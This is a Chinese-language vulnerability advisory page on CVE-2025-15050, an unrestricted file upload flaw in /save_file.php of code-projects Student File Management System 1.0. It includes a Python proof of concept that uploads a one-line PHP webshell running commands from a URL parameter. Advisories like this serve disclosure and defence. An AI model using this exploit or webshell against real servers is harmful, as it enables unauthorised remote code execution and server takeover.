IPBUF安全漏洞报告
English
CVE-2025-15050 CVSS 6.3 中危

CVE-2025-15050: code-projects Student File Management System 1.0 任意文件上传漏洞

披露日期: 2025-12-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-15050
漏洞类型
无限制文件上传
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
code-projects Student File Management System 1.0

相关标签

无限制文件上传Webshell远程代码执行Student File Management System

漏洞概述

CVE-2025-15050是code-projects Student File Management System 1.0中发现的安全漏洞。

技术细节

该漏洞位于/save_file.php文件处理模块,攻击者可通过构造恶意文件利用系统文件上传功能。系统缺乏有效的文件类型和内容验证机制,允许上传任意文件类型。攻击者可通过此漏洞上传Webshell,进而执行任意代码,完全控制受影响的服务器。漏洞具有网络可访问性,低权限用户即可利用,无需特殊用户交互。

攻击链分析

STEP 1
步骤1
攻击者识别目标系统
STEP 2
步骤2
构造恶意文件上传请求
STEP 3
步骤3
获取Webshell访问权限
STEP 4
步骤4
执行系统命令实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys def exploit_cve_2025_15050(target_url): """ CVE-2025-15050 PoC - Student File Management System Unrestricted File Upload """ upload_url = f"{target_url}/save_file.php" # 恶意PHP文件内容 payload = '<?php system($_GET["cmd"]); ?>' files = { "File": ("shell.php", payload, "application/x-php") } try: response = requests.post(upload_url, files=files) if response.status_code == 200: print(f"[+] File uploaded successfully!") print(f"[+] Access shell at: {target_url}/uploads/shell.php?cmd=whoami") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <target_url>") sys.exit(1) exploit_cve_2025_15050(sys.argv[1])

影响范围

code-projects Student File Management System 1.0

防御指南

临时缓解措施
立即限制文件上传功能,审查现有上传文件,实施输入验证机制。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表